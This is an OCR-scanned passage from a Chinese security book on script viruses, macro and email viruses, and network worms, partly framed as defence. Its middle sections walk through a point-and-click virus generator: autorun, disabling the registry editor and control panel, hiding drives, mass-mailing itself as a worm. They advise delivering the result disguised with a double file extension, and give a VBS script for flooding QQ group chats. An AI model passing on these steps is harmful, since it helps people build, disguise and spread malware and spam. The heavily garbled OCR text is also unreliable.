传播 的 病毒 ， 如 红色 代码 (Script.Redlof) 脚本 病毒 还 会 有 VBS、JS (表明 是 何 种 脚本 编写 
的 ) 等 本 级 ， 如 欢乐 时 光 (VBS.Happytime )、 十 四 日 (Js.Fortnight.c.s) 等 。 只 有 了 解 了 脚 
本 病毒 的 特点 及 生成 过 程 ， 才 能 更 好 地 对 该 病毒 做 好 防范 。 





























4.3.1 VBs 脚本 病毒 的 特点 


VBS 病毒 是 用 VB Script 编写 而 成 的 ,该 脚本 语言 功能 非常 强大 ， 它们 利用 Windows 
系统 的 开放 性 特点 ， 通 过 调用 一 些 现成 的 Windows 对 象 、 组 件 ， 可 以 直接 对 文件 系统 、 











注册 表 等 进行 控制 。 应 该 说 ， 病 毒 就 是 一 种 思想 ， 而 这 种 思想 在 用 VBS 实现 时 变 得 极其 
容易 。 





VBS 脚本 病毒 具有 如 下 几 个 特点 。 

1) 编写 简单 。 即 便 以 前 对 病毒 一 无 所 知 , 也 可 以 在 很 短 的 时 间 里 编 出 一 个 新 型 病毒 来 。 

2) 破坏 力 大 。 其 破坏 力 个 仅 表 现在 对 用 户 系 统 文件 及 性 能 的 破坏 ， 而 且 可 以 使 邮件 服 
务 故 朋 湾 ， 网 络 友 生 严 重 阻 窗 。 

3) 感染 力 强 。 由 于 脚本 是 直接 解释 执行 ， 并 且 它 不 需要 像 PE 病毒 那样 ， 需 要 做 复杂 
的 PE 文件 格式 处 理 ， 因 此 这 类 病毒 可 以 直接 通过 目 我 复制 的 方式 感染 其 他 同类 文件 ， 并 
且 日 我 的 异常 处 理 变 得 非常 容易 。 

4) 传播 范围 大 。 这 类 病毒 通过 htm 文档 、 电 子 邮件 附件 或 其 他 方式 ， 可 以 在 很 短 时 间 
内 传 志 世界 各 地 。 
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5) 病毒 源码 容易 被 获取 ， 变 种 多 。 由 于 VBS 病毒 解释 执行 ， 其 源 代 码 可 读 性 非 
第 强 ， 即 使 病毒 源码 经 过 加 密 处 理 ， 其 源 代 码 的 获取 也 还 是 比较 简单 。 因 此 ， 这 类 病 
毒 变种 比较 多 ， 稍 微 改 变 病 毒 的 结构 ， 或 者 修改 特征 值 ， 很 多 杀毒 软件 可 能 瓯 无 能 久 
了 

6) 雁 驴 性 强 。 脚 本 病毒 为 了 得 到 运行 机 会 ， 往 往 会 采用 各 种 让 用 户 不 大 注意 的 手段 ， 
壁 如 ， 邮 件 的 附件 名 采用 双 后 级 ， 如 .jpg.vbs， 由 于 系统 默认 不 显示 后 级 ， 这 样 ， 用 户 看 到 
这 个 文件 的 时 候 ， 残 会 认为 它 古 一 个 jpg 图 片 文件 。 

7) 使 得 病毒 生产 机 实现 起 来 非 党 容易。 所谓 病 毒 生 产 机 ， 束 是 可 以 按照 用 户 的 意愿 生 
产 病毒 的 机 右 (当然 ， 这 里 指 的 是 程序 )， 目 前 的 病毒 生产 机 ， 之 所 以 大 多 数 部 为 脚本 病毒 
生产 机 ， 其 中 最 重要 的 一 点 还 是 因为 脚本 是 解释 执行 的 ， 实 现 起 来 非 第 容易 ， 上 基体 将 在 后 
面谈 及 。 
































4.3.2 VBs 脚本 病毒 通过 网 络 传播 的 几 种 方式 


VBS 脚本 病毒 之 所 以 传播 范围 广 ， 主 要 依赖 于 它 的 网 络 传播 功能 ， 一 般 来 说 ，VBS 肢 
本 病毒 采用 如 下 几 种 方式 进行 传播 。 

1. 通过 电子 邮件 传播 

这 是 一 种 用 得 非常 普遍 的 传播 方式 。 病 毒 可 以 通过 各 种 方法 得 到 合法 的 邮箱 地 址 ， 最 
常见 的 就 是 直接 取 Outlook 地 址 簿 中 的 邮箱 地 址 ， 也 可 以 通过 程序 在 用 户 文档 ( 壁 如 htm 
文件 ) 中 搜索 邮箱 地 址 。 

2. 通过 局 域 网 共享 传播 

局 域 网 共享 传播 也 是 一 种 非常 普遍 并 且 有 效 的 网 络 传播 方式 。 为 了 交流 方便 ， 局 域 网 
内 一 般 都 存在 不 少 共享 目录 ， 并 且 具 有 可 写 权 限 ， 这 样 病毒 通过 搜索 这 些 共享 目录 ， 就 可 
以 将 病毒 代码 传播 到 这 些 目 录 之 中 。 

3. 通过 感染 htm 等 网 页 文件 传播 

如 今 ，WWW 服务 已 经 变 得 非常 普遍 ， 病 毒 通过 感染 htm、asp、jsp、php 等 网 页 文件 ， 
势必 会 导致 所 有 访问 过 该 网 页 的 用 户 机 器 感染 病毒 

4. 通过 IRC 聊天 通道 传播 

另外 ， 病 毒 也 可 以 通过 现在 广泛 流行 的 KaZaA 进行 传播 。 将 病毒 文件 复制 到 KaZaA 
的 默认 共享 目录 中 ， 这 样 ， 当 其 他 用 户 访问 这 台 机 器 时 ， 就 有 可 能 下 载 该 病毒 文件 并 执行 。 
这 种 传播 方法 可 能 会 随 着 KaZaA 这 种 点 对 点 共享 工具 的 流行 而 发 生 作用 。 
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4.3:3 VB 脚本 病毒 生成 机 


现在 网 络 中 还 流行 “VBS 脚本 病毒 生成 机 ”这 样 的 自动 生成 脚本 语言 的 软件 ， 无 须 党 
握 枯燥 的 语言 ， 即 可 自制 VBS 脚本 病毒 。 
下 面 曝光 脚本 病毒 的 制作 过 程 ， 具 体 的 操作 步骤 如 下 。 
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STEP01: 启动 病毒 生成 器 v1.0 STEP02: 程序 相关 介绍 


加 


文件 (有 ”编辑 (E) ”查看 (V) 工具 (T) ”帮助 (H) 
组 织 了 打开 ”新建 文件 夫 





a a 


virl.exe 


应 用 程序 软件 作者 : 夏 效 恩 E-MAIL: 1iuli5542Q@sohu. com 





修改 日 期 :|2002/9/11 15:05 00000038913_ cnisina. com. em 





下 载 并 解压 “病毒 生成 器 ”压缩 文件 ， 打 开 对 应 的 ”加 打开 “第 一 步 了 解 本 程序 ” 单 击 “ 下 一 


文件 夹 ， 双 击 “vir1.exe” 应 用 程序 图 标 。 界面 后 ， 可 看 到 该 程序 的 相关 步 ” 按 钮 。 
介绍 。 
STEP03: 设置 病毒 复制 选项 STEP04: 设置 禁止 功能 选项 


病毒 制造 机 v1.0 


病毒 制造 机 v1.0 


第 二 步 病毒 复制 选项 第 三 步 禁止 功能 选项 


禁止 “运行 ” 莱 单 开机 自动 运行 


昌 市 病毒 副 | 本 至 WI 可 0WS 训 忻 夹 IHDOWSAWINNT) 吝 || “关闭 系统 ” 荣 单 


复制 病毒 副本 到 系统 文件 赤 (SYSTEMW/SYSTEM32) 


病毒 剧本 六 件 名 : 


隐藏 盘 符 证 注入- Ds 模式 

右 止 使 用 注册 表 编 辑 器 禁止 “任务 栏 和 开始 ” 
禁止 注册 表 扫 换 禁止 右键 菜单 

禁止 “注销 ”菜单 禁用 “控制 面板 ” 

替 止 进入 NS-00s 实 模式 禁止 使 用 RE5 交 件 《 危 险 ) 





国 义 选 相应 复 选 框 并 填写 单 击 “ 下 一 步 ” 根据 所 要 制作 的 病毒 功能 单 击 “ 下 一 步 ” 


病毒 副本 文件 名 。 


be 


小 技 攻 


按钮 。 勾 选 要 禁止 的 功能 。 按钮 。 
公 先 禁止 功能 选 砚 
老 勾 选 “ 开 机 自动 运行 ” 复 选 框 ， 则 病毒 将 自身 加 入 注册 表 ， 伴 随 
系统 局 动 悄悄 运行 ; 如 果 勾 选 “ 禁 止 “运行 ' 菜单 ”“ 茶 止 ‘关闭 系统 
菜单 “禁止 “任务 栏 和 开始 " ”及 “禁止 显示 桌面 所 有 图 标 ” 等 复 选 框 ， 
让 中 毒 者 的 计算 机 出 现 些 莫名 其 妙 的 错误 ; 如 果 勾 选 “ 隐 藏 上 盘 符 ”“ 禁 
止 注 册 表 扫描 ”“ 禁 用 “控制 面板 ' ”等 复 选 框 ， 则 会 出 现 开机 后 找 不 到 


硬盘 分 区 、 无 法 运行 注册 表 编 辑 器 、 无 法 打开 控制 面板 等 状况 。 
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STEP05: 设置 病毒 提示 
病毒 制造 机 v1.0 
第 四 步 病毒 提示 对 话 框 
谍 置 开机 提示 对 话 框 
设置 开机 提示 框 标题 : 


设置 开机 提示 框 内容 : ”| 状 地 ， 


国 久 选 “设置 开机 提示 对 话 ” 国 单 击 “ 下 一 步 
框 > 复 选 框 ， 并 填写 开机 提示 ”按钮 。 


框 标题 以 及 内 容 信 息 。 


STEP07: 设置 IE 修改 选项 
病毒 制造 机 v1.0 < 


第 六 步 IE 修 改选 项 
禁用 I 右 键 菜单 
在 止 Internet 进 殴 
禁用 “另存 为 ... ”菜单 





禁止 更 改 历史 记录 讽 秆 
奉 止 Internet] 车 接 回 导 





在 文本 框 中 输入 病 单 击 “ 开 始 制造 ， 
毒 文件 存放 位 置 。 按钮。 
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病毒 攻防 
STEP06: 设置 病毒 传播 选项 
病 圳 届 疙 机 .v1.0 


第 五 步 病毒 传播 选项 
通过 电子 邮件 进行 自动 传播 〈 蜂 虫 ) 


每 次 运行 自动 向 地 址 涛 中 的 前 


名 点 运 融 毒 邮 件 。 


勾 选 “通过 电子 邮件 进行 自 较 单 击 “ 下 一 步 " 
动 传播 ( 蠕虫 ” 复 选 框 ， 并 填 按钮 。 
写 发 送 带 毒 邮件 的 地 址 数量 。 





国 义 选 要 禁用 的 |E 功能， 然后 单 击 “ 下 一 步 ” 按 
钮 。 


在 打开 的 “设置 主页 ”对 话 框 中 填写 主页 地 址 ， 
并 单 击 “ 确 认输 入 "按钮 。 


STEP09: 病毒 正在 生成 
病毒 制造 机 v1.0 
第 七 步 开始 制造 病毒 
请 畏 六 病毒 文件 存放 位 置 : 


pb:\. vhs 


LR 





在 “第 七 步 开始 制造 病毒 "界面 中 出 现 病 毒 生成 进 
度 条 ， 完 成 后 可 在 文件 存储 位 置 查 看 已 经 生成 的 病 


EE 
苹 o 





EE | 
取 > 
关 肛 攻防 从 入 门 到 精通 


1 ) 病毒 生成 之 后 ， 如 何 让 病毒 在 对 方 的 计算 机 上 和 运行 呢 ? 有 许多 种 
方法 ， 比 如 修改 文件 名 、 使 用 双 后 缀 的 文件 名 ， 如 “病毒 .fxtvbs” 等 ， 再 
通过 邮件 附件 发 送出 去 。 


2 ) 在 用 此 软件 制造 生成 病毒 的 同时 ， 会 产生 一 个 名 为 “reset.vbs” 的 
小 技 了 恢复 文件 ， 如 果 不 小 心 运行 了 病毒 ， 使 得 系统 不 能 正常 工作 , 则 可 以 运行 
该 恢复 文件 来 解救 。 





4.3.4 刷 屏 的 好 脚本 病毒 曝光 


VBS 脚本 语言 功能 强大 ， 而 且 使 用 异 稼 简单 ， 下 面 将 曝光 如 何 制作 一 个 可 以 在 QQ 群 
聊天 室 中 上 自动 刷 屏 的 VBS 病毒 。 

(1) 生成 VBS 脚本 

新 建 一 个 记事 本 ， 并 在 空白 的 文本 框 中 输入 如 下 代码 : 


Set WshShell= WScript.CreateObject ("WScript.Shell") 











Wahshell ABDAGLIVate "这 个 笠 丰 好 全 
for .1s=1. tO 10 

WScript.Sleep 500 
WshShell.SendKeys "Vv" 
WshShell.SendKeys 1 
WshShell.SendKeys "%s" 

Next 


其 中 “for 二 1 to 10” 语 句 是 用 来 控制 发 送 次 数 的 ， 表 示 发 送 10 次 ， 可 以 改 为 更 大 的 数 
字 。 其 中 很 重要 的 一 句 是 “WshShell.AppActivate "这 个 群 真 好 玩 "”， 该 语句 指定 了 要 刷 的 
QQ 和 群 名 称 , 可 以 根据 需要 修改 。 在 输入 完毕 后 , 将 文件 保存 为 以 .vbs 为 后 级 的 任意 文件 名 ， 
如 “qq.vbs”。 

(2) 刷 QQ 和 群 聊天 屏 

打开 一 个 QQ 群 聊天 窗口 并 复制 要 发 送 的 内 容 到 副 贴 板 上 ， 如 复制 “什么 ?”” 双击 刚 
才 生 成 的 “qq.vbs” 切 换 到 和 群 聊天 窗口 中 ， 在 其 中 可 看 到 QQ 群 正在 自动 刷 屏 。 


qqvbs -a Er 
| 文 H( 编 召 E) 相 式 (0) 坦 看 M Bt | 
Set WshShell= WScript. CreateOQbject( WScript. Shell”) *“ 
WshShell. AppActivate “这 个 群 真 好 玩 ” 

for i=1 to 10 

WScript. Sleep 500 ，、， A 一 



























司 呈 苞 
toms(2302238958) 11:01:25 












.什么 ?2 : 
“什么 ?3 回回 加 
.什么 ?4 | 群 疯 频 语言 。 投票 看 节目 
.什么 ?5 
.什么 ?6 器 

答 到 


“什么 ?7 
“什么 ?8 群 成 员 (1/1) D 
.什么 ?9 且 轩 ioms(2302z23s959) 区 
“什么 ?10 ¥| 
A 固 人 鳄 梧 国 - 回 局 - 员 喝 - 国 消 和 ie 录 - 

















| 关闭 QO |] | 败 xe) | | 
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4.3.9 ”如 何 防 沁 VB 脚本 病毒 


1. VBS 脚本 病毒 的 弱点 











由 于 VBS 脚本 病毒 的 编写 语言 为 脚本 ， 因 而 它 不 会 像 PE 文件 那样 方便 灵活 ，VBS 脚 
本 病毒 的 运行 是 需要 条 件 的 (不 过 ， 这 种 条 件 在 默认 情况 下 束 已 经 具备 了 )。 

VBS 脚本 病毒 一 般 具 有 如 下 弱 氮 。 

1) 绝 大 部 分 VBS 脚本 病毒 运行 的 时 候 需 要 用 到 一 个 对 象 ， FileSystemObject。 

2) VBS 代码 是 通过 WSH (Windows Script Host，Windows 脚本 宿主 ) 来 解释 执行 的 。 

3) VBS 脚本 病毒 的 运行 需要 其 关联 程序 Wscript.exe 的 文 持 。 

4) 通过 网 页 传播 的 病毒 需要 ActiveX 的 文 持 。 

5) 通过 电子 邮件 传播 的 病毒 需要 OE (Outlook Express) 的 目 动 发 送 邮 件 功 能 文 持 ， 
但 是 绝 大 部 分 病毒 都 是 以 电子 邮件 为 主要 传播 方式 的 。 

2. 如 何 防范 VBS 脚本 病毒 

1 ) 禁用 文件 系统 对 象 FileSystemObject。 

方法 : 用 “regsvr32 scrrun.dll /nu” 命 令 禁 止 文件 系统 对 象 ， 其 中 ，regsvr32 是 Windows' 
System 下 的 可 执行 文件 。 或 者 直接 查找 scrrun.dll 文件 ， 将 其 删除 或 者 改名 。 

2) 在 Windows 目录 中 找到 WScriptexe， 更 改名 称 或 者 删除 ， 如 果 以 后 有 机 会 用 到 的 
话 ， 束 更 改名 称 。 当 然 ， 删 除 后 可 以 重 狐 安装 。 

3) 要 彻 抵 防范 VBS 网 络 蠕虫 病毒 ， 还 须 设置 浏览 占 。 肯 和 完 打开 浏 吃 器 ,选择 “工具 ”> 
“Internet 选项 ”有 沫 单 命令 ， 在 弹出 的 “Internet 属性 ”对 话 框 的 “安全 ”选项 卡 中 单 击 “日 
定义 级 别 ” 按 钮 ， 在 “安全 设置 -Internet 区 域 ” 对 话 框 中 把 “ActiveX 控件 及 插件 ”的 所 有 
选项 都 设 为 禁用 ， 这 样 束 不 怕 了 。 

4) 禁用 OF 的 目 动 收 发 邮件 功能 。 

5) 由 于 蜂 虫 病毒 大 多 利用 文件 扩展 名 做 文章 ,因此 要 防范 它 束 不 要 隐藏 系统 中 已 知 文 
件 类 型 的 扩展 名 。Windows 默认 勾 选 “隐藏 已 知 文件 类 型 的 扩展 名 称 ” 复 选 枉 ， 取 消 勺 选 
该 复 选 框 ， 即 修改 为 显示 所 有 文件 类 型 的 扩展 名 称 。 

6) 将 系统 的 网 络 连 接 的 安全 级 别人 至 少 设 置 为 “中 等 ” 这 样 可 以 在 一 定 程 度 上 预防 某 
些 有 害 的 Java 程序 或 者 某 些 ActiveX 组 件 对 计算 机 的 侵害 。 

7) 杀毒 软件 的 使 用 非常 重要 。 


4.4 ” 安 病 毒 与 邮件 病毒 的 防范 


宏 病毒 与 邮件 病毒 是 广大 计算 机 用 户 经 常 遇 到 的 病毒 ， 如 来 中 了 这 些 病毒 ， 束 可 能 会 
给 日 己 造 成 重大 损失 ， 所 以 有 必要 了 解 一 些 这 方面 的 防范 知识 。 


4.4.1 安 病 毒 的 判断 方法 
虽然 不 是 所 有 包含 宏 的 文档 都 包含 宏 病毒 , 但 当 有 下 列 情 况 之 一 时 , 可 以 断定 该 Office 
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文档 或 Office 系统 中 有 宏 病 毒 。 

1) 在 打开 “ 安 病毒 防护 功能 ”的 情况 下 ， 当 打开 一 个 自己 编辑 的 文档 时 ， 系 统 会 弹出 
相应 的 警告 对 话 框 。 然 而 ， 实 际 上 并 没有 在 其 中 使 用 宏 或 并 不 知道 到 底 怎么 用 宏 ， 那 么 就 
可 以 肯定 该 文档 已 经 感染 了 安 病毒 。 

2) 在 打开 “ 宏 病 毒 防护 功能 ”的 情况 下 ，Office 文档 中 一 系列 的 文件 都 在 打开 时 给 出 
宏 警 告 。 如 果 用 户 很 少 使 用 到 宏 ， 那 么 当 看 到 成 串 的 文档 有 宏 警 告 时 ， 可 以 青 定 这 些 文档 
中 有 宏 病毒 。 

3) Word 中 提供 了 对 宏 病毒 的 防范 功能 ， 但 有 些 宏 病毒 为 了 对 付 Office 中 提供 的 宏 
警告 功能 ， 在 感染 系统 (通常 只 有 在 用 户 关闭 了 宏 病 毒 防范 选项 或 者 出 现 宏 警 告 后 不 贸 
神 选取 了 “启用 宏 ” 才 有 可 能 ) 后 ， 会 在 用 户 每 次 退出 Office 时 自动 屏蔽 掉 宏 病毒 防范 
选项 。 因此 ,用户 一 旦 发 现 自己 设置 的 宏 病 毒 防范 功能 选项 无 法 在 两 次 启动 Word 之 间 保 










































































持 有 效 ， 则 可 以 肯定 自己 的 系统 感染 了 宏 病 毒 。 也 束 是 说 ， 一 系列 Word 模板 ， 特 别 是 
normal.dot 已 经 被 感染 。 





4.4.2 ”防范 与 清除 宏 病 毒 


预防 和 清除 宏 病毒 的 操作 方法 很 多 ， 下 和 面 介绍 一 个 首选 方法 和 一 个 应 急 处 理 方法 。 

(1) 首选 方法 

使 用 反 病 毒 软件 是 一 种 高 效 、 安 全 和 方便 的 请 除 方法 ， 也 是 一 般 计 算 机 用 户 的 首选 方 
法 。 但 使 用 通用 的 反 病 毒 软 件 不 一 定 能 得 出 宏 病 毒 ， 这 方面 的 突出 例子 承 是 ETHAN 安 病 
吾 。ETHAN 宏 病 毒 相当 隐蔽 ， 用户 使 用 较 独 版 本 的 反 病 毒 软件 部 可 能 无 法 合 出 。 此 外 ， 这 
个 宏 病 毒 能 够 悄悄 取消 Word 的 宏 病 毒 防范 功能 ， 并 且 菏 些 情况 下 会 把 被 感染 的 文档 年 为 
只 读 属 性 ， 从 而 更 好 地 隐藏 目 己 。 

因此 ， 对 付 宏 病 毒 应 该 和 对 付 其 他 种 类 的 病毒 一 样 ， 也 要 尽量 使 用 最 新 版 的 反 病 毒 软 
件 。 无 论 用 户 使 用 的 是 何 种 反 病毒 软件 ， 太 时 升级 病毒 库 痢 是非 第 重要 的 。 

(2) 应 急 处 理 方法 

如 条 用 户 的 Word 没有 感染 宏 病 毒 ， 但 需要 打开 茶 个 外 来 的 、 已 得 出 感染 宏 病 毒 的 文 
档 ， 而 手头 的 反 病 毒 软 件 叉 无 法 得 杀 它 们 ， 融 可 以 符 试 用 写字 板 或 Word 文档 作为 清除 宏 
病毒 的 桥 桨 来 得 杀 文 档 中 的 宏 病 毒 : 打开 感染 了 宏 病 毒 的 文档 《〈 司 用 Word 的 宏 病 毒 防范 
功能 并 在 安 警 合 出 现时 选择 “取消 宏 ”， 选 择 “ 文 件 ”>“ 万 存 为 ”及 单 俞 令 ， 将 此 文档 存 
成 写字 板 (RTF) 格式 或 Word 格式 。 

在 上 述 方法 中 ， 存 成 写字 板 格式 是 利用 RTF 文档 格式 没有 宏 的 特点 ， 存 成 Word 格式 
则 是 利用 Word 文档 在 转换 格式 时 会 失去 宏 的 特点 。 写 字 板 所 用 的 RIF 格式 适用 于 文档 中 
仅 有 文字 和 图 片 的 情况 ， 如 宋 文 档 中 除了 文字 、 图 片 还 有 疼 形 或 表格 ， 则 按 Word 格式 保 
存 一 般 不 会 失去 这 些 内 容 。 存 盘 后 应 该 检 奉 一 下 文档 的 完整 性 ， 如 末 文 档 内 容 没 有 任何 丢 
失 ， 并 且 在 重新 打开 此 文档 时 不 再 出 现 宏 警 告 则 大 功 告 成 。 
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和 44.3 全 面 防御 邮件 病毒 


邮件 病毒 是 通过 电子 邮件 方式 进行 传播 的 病毒 的 总 称 。 电 子 邮件 传播 病毒 通 疝 征 把 月 
己 作为 附件 发 送 给 被 攻击 者 ， 如 果 收 到 该 邮件 的 用 户 不 小 心 打 开 了 附件 ， 病 毒 束 会 感染 本 
地 计算 机 。 画 外 ， 由 于 电子 邮件 客户 站 程序 的 一 些 漏 洞 ， 也 可 能 家 攻击 者 利用 来 传播 电子 
邮件 病毒 ， 微 软 的 Outlook Express 束 置 经 因为 两 个 漏洞 可 以 被 攻击 者 编制 特制 的 代码 ， 使 
接受 到 邮件 的 用 户 不 需要 打开 附件 ， 即 可 目 动 运行 病毒 文件 。 

在 了 解 了 邮件 病毒 的 传染 方式 后 ， 用 户 束 可 以 根据 其 特性 制定 出 相应 的 防范 措施 。 

1) 安 冯 防 病毒 程序 。 防 箱 病 毒 感 染 的 最 佳 方法 就 是 安 猴 防 病毒 扫描 程序 并 及 时 更 新 。 
防 病毒 程序 可 以 扫描 传 入 的 电子 邮件 中 的 已 知 病毒 ， 并 防止 这 些 病毒 感 当 计算机。 新 病毒 
几乎 每 天 都 会 出 现 ， 因 此 需要 及 时 更 痢 防 病毒 程序 。 多 数 防 病毒 程序 都 可 以 设置 为 定期 月 
动 更 新 ， 以 具备 瑚 要 与 最 新 病毒 进行 斗争 的 信息 。 

2) 打开 电子 邮件 附件 时 要 非常 小 心 。 电 子 邮 件 附 件 是 主要 的 病毒 感染 源 。 例如， 用 三 
可 能 会 收 到 一 封 市 有 附件 的 电子 邮件 (发 送 者 可 能 是 目 己 认识 的 人 ), 该 附件 被 伪装 为 文档 、 
照 厂 或 程序 ， 但 实际 上 是 病毒 。 如 果 打 开 该 文件 ， 病 毒 束 会 感染 计算 机 。 如 果 收 到 意外 的 
电子 邮件 附件 ， 请 考虑 在 打开 附件 之 前 先 答复 发 件 人 ， 回 清 是 否 确 实 发 送 了 这 些 附件 。 

3) 使 用 防 病毒 程序 检 奏 压缩 文件 内 容 。 病 毒 编写 者 将 恶意 文件 溢 入 计算 机 中 的 一 种 方 
法 是 使 用 压缩 文件 格式 〈 如 .zip 或 .rar 格式 ) 将 文件 作为 附件 发 送 。 多 数 防 病毒 程序 会 在 接 
收 到 附件 时 进行 扫描 ,但 为 了 安全 起 见 ， 应 该 将 压缩 的 附件 保存 到 计算 机 的 一 个 文件 夹 中 ， 
在 打开 其 中 所 包含 的 任何 文件 之 前 先 使 用 防 病毒 程序 进行 扫 摘 。 

4) 单 击 邮 件 中 的 链接 时 须 庶 屠 。 电 子 邮 件 中 的 欺 驴 性 链接 通常 作为 仿 时 和 间 并 软件 骗 
局 的 一 部 分 使 用 ， 但 也 会 用 来 传输 病毒 。 单 击 欺骗 性 链接 会 打开 一 个 网 页 ， 访 网 页 将 试图 
让 计算 机 下 载 恶 意 软 件 。 因 此 在 单 击 邮件 中 的 链接 时 要 格外 小 心 ， 苑 其 是 邮件 正文 看 上 去 
含糊 不 清 ， 如 邮件 上 写 者 “ 奉 看 我 们 的 假期 图 片 ”， 但 没有 标识 用 户 或 发 件 人 的 个 人 信息 。 


4.5 ”网 络 蠕虫 的 防范 


与 传统 的 病毒 个 同 ， 蜂 虫 病 豆 以 计算 机 为 形体 ， 以 网 络 为 攻击 对 象 ， 网 络 蠕虫 病毒 可 
分 为 利用 系统 级 别 漏洞 (主动 传播 ) 和 利用 社会 工程 学 (欺骗 传播 ) 两 种 。 在 宽带 网 络 迅 
速 普及 的 今天 ， 蚂 虫 病毒 在 技术 上 已 经 能 够 成 熟地 利用 各 种 网 络 资源 进行 传播 。 所 以 ， 了 
解 晴 虫 病毒 的 特点 并 做 好 防范 非 钊 有 必要 。 






















































































































































































4.9.1 ”网络 蠕虫 病毒 实例 分 析 


日前 ， 产 生 严 重 影 啊 的 蠕虫 病毒 有 很 多 ， 如 “器 里 斯 蠕虫 ”“ 美 丽 攻 于”“ 爱 虫 病毒 ” 
“红色 代码 ”“ 尼 姆 亚 ”“ 求 职 信 ”和 “蠕虫 王 ” 等 ， 它 们 都 给 入 们 留 下 了 深刻 的 印象 。 

1.“Guapim” 蠕 虫 病毒 

“Guapim”(Worm.Guapim) 贤 虫 病毒 的 特征 为 : 通过 即时 聊天 工 上 其 和 文件 共 至 网 络 传 
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播 的 蠕虫 病毒 。 发 作 症 状 : 病毒 在 系统 目录 下 释放 病毒 文件 System32%\pkguar d32.exe， 并 
在 注册 表 中 添加 特定 键 值 以 实现 目 局 动 。 该 病毒 会 给 MSN、QQ 等 聊天 工具 的 好 友 发 送 诱 
惑 性 消息 :“Hehe.takea look at this funny game http://****//Monkye.exe”， 同 时 假借 Howto 
Hack.exe、HalfLife2FULL.exe、WindowsXP.exe、VisualStudio2005.exe 等 文件 名 复制 目 身 到 
文件 共享 网 络 ， 并 试图 在 Internet 上 下 载 执行 另 一 个 旺 果 病毒， 直接 降低 系统 安全 设置 ， 给 
用 户 的 正 沿 操作 市 来 极 大 的 隐患 。 

2. 安 莱 普 蠕虫 病毒 

“ 安 羔 普 ”(Worm.Anap.b) 晴 虫 病毒 通过 电子 邮件 传播 ， 利 用 用 户 对 知名 品牌 的 信任 
心理 ,伪装 成 某 些 知名 I 工厂 商 〈( 如 成 微软 、IBM 等 ) 给 用 户 狂 发 带 毒 邮件 ， 诱 驴 用 户 打 开 
附件 以 致 中 毒 。 病 毒 运行 后 会 弹出 一 个 窗口 ， 内 容 提示 为 “这 是 一 个 蠕虫 病毒 ”。 同 时 ， 议 
病毒 会 在 系统 临时 文件 和 个 人 文件 夹 中 大 量 收集 邮件 地 址 ， 并 循环 发 送 邮 件 。 


















































针对 这 种 典型 的 邮件 传播 病毒 ， 大 家 在 查看 自己 的 电子 邮件 时 ， 一 定 要 确 
定 发 件 人 再 打开 。 


虽然 利用 邮件 进行 传播 一 直 是 病毒 传播 的 主要 途径 ， 但 随 着 网 络 威胁 种 类 
的 增多 和 病毒 传播 途径 的 多 样 化 ， 某 些 蠕虫 病毒 往往 还 携带 着 “ 间 恋 软件 ”和 
“网 络 钓 鱼 ” 等 不 安全 因素 。 因 此 ， 一 定 要 注意 即时 升级 杀毒 软件 到 最 新 版 本 ， 
并 打开 邮件 监控 程序 ， 以 保证 上 网 环境 的 安全 。 





4.9.2 ”网络 里 虫 病毒 的 全 面 防 学 








在 对 网 络 蠕虫 病毒 有 了 一 定 的 了 解 之 后 ， 下 面 从 企业 和 个 人 两 种 角度 讲述 应 该 如 何 做 
好 安全 防范 ， 

(1) 企业 用 户 对 网 络 蠕虫 的 防范 

企业 在 充分 地 利用 网 络 进行 业务 处 理 时 ， 不 得 不 考虑 企业 的 病毒 防范 问题 ， 以 保证 关 
系 企业 命运 的 业务 数据 完整 、 不 被 破坏 。 企 业 防 范 蠕虫 病毒 时 需要 考虑 几 个 问题 ， 病 毒 的 
查 杀 能 力 、 病 毒 的 监控 能 力 和 新 病毒 的 反应 能 

推荐 的 企业 防范 蠕虫 病毒 的 策略 如 下 。 

1) 加 强 安全 管理 ， 提 高 安全 意识 。 由 于 蠕虫 病毒 是 利用 Windows 系统 漏洞 进行 攻击 
的 ， 因 此 ， 就 要 求 网 络 管理 员 在 第 一 时 间 内 保持 系统 和 应 用 软件 的 安全 性 ， 保 持 各 种 操作 
系统 和 应 用 软件 的 及 时 更 新 。 随 着 Windows 系统 各 种 漏洞 的 不 断 涌现 ， 要 想 一 劳 永 逸 地 获 
得 一 个 安全 的 系统 环境 ， 已 几乎 没有 可 能 。 而 作为 系统 负载 重要 数据 的 企业 用 户 ， 其 所 面 
临 攻 击 的 危险 也 将 越 来 越 大 ， 这 就 要 求 企业 的 管理 水 平和 安全 意识 也 必须 越 来 越 高 。 

2) 建立 病毒 检测 系统 。 能 够 在 第 一 时 间 内 检测 到 网 络 异常 和 病毒 攻击 。 

3) 建立 应 急 响应 系统 ， 尽 量 降低 风险 。 由 于 蠕虫 病毒 爆发 的 突然 性 ， 病 毒 可 能 在 被 发 
现时 已 萤 延 到 了 整个 网 络 ， 因 此 建立 一 个 紧急 响应 系统 就 显得 非常 必要 ， 这 样 能 够 在 病毒 
时 发 的 第 一 时 间 提供 解 次 方案 。 

4) 建立 灾难 备份 系统 。 对 于 数据 库 和 数据 系统 ， 必 须 采用 定期 备份 、 多 机 备份 措施 ， 
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防止 意外 灾难 导致 的 数据 丢失 。 

5) 对 于 局 域 网 而 言 ， 可 安装 防火 墙 式 的 计算 机 病毒 防 杀 产品 ， 将 病毒 隅 离 在 局 域 网 之 
外 ; 或 对 邮件 服务 器 实施 监控 ,切断 市 毒 邮 件 的 传播 途径 ;或 对 局 域 网 省 理 员 和 用 户 进 行 
安全 培训 ; 建立 局 域 网 内 部 的 升级 系统 ， 包 括 各 种 操作 系统 的 补丁 升级 、 各 种 常用 的 应 用 
软件 升级 、 各 种 杀毒 软件 病毒 库 的 升级 等 。 

(2) 个 人 用 尸 对 网 络 蠕虫 的 防 汽 

对 于 个 人 用 户 而 言 ， 威 胁 大 的 蠕虫 病毒 采取 的 传播 方式 一 般 为 电子 邮件 (Email) 以 及 
恶意 网 页 等 。 下 面 介 绍 个 人 应 该 如 何 防 范 网 络 晴 虫 病毒 。 

1) 安装 合适 的 杀毒 软件 。 网 络 贤 虫 病毒 的 发 展 已 经 使 传统 的 杀毒 软件 的 “文件 级 实时 
监控 系统 ” 洲 伍 ， 杀 毒 软件 必须 回 内 存 实时 监控 和 邮件 实时 监控 发 展 ， 网 页 病毒 也 使 用 户 
对 杀毒 软件 的 要 求 越 来 越 高 。 

2) 经 常 升级 病毒 库 。 杀毒 软件 对 病毒 的 查 杀 是 以 病毒 的 特征 码 为 依据 的 ,而 病毒 每 天 
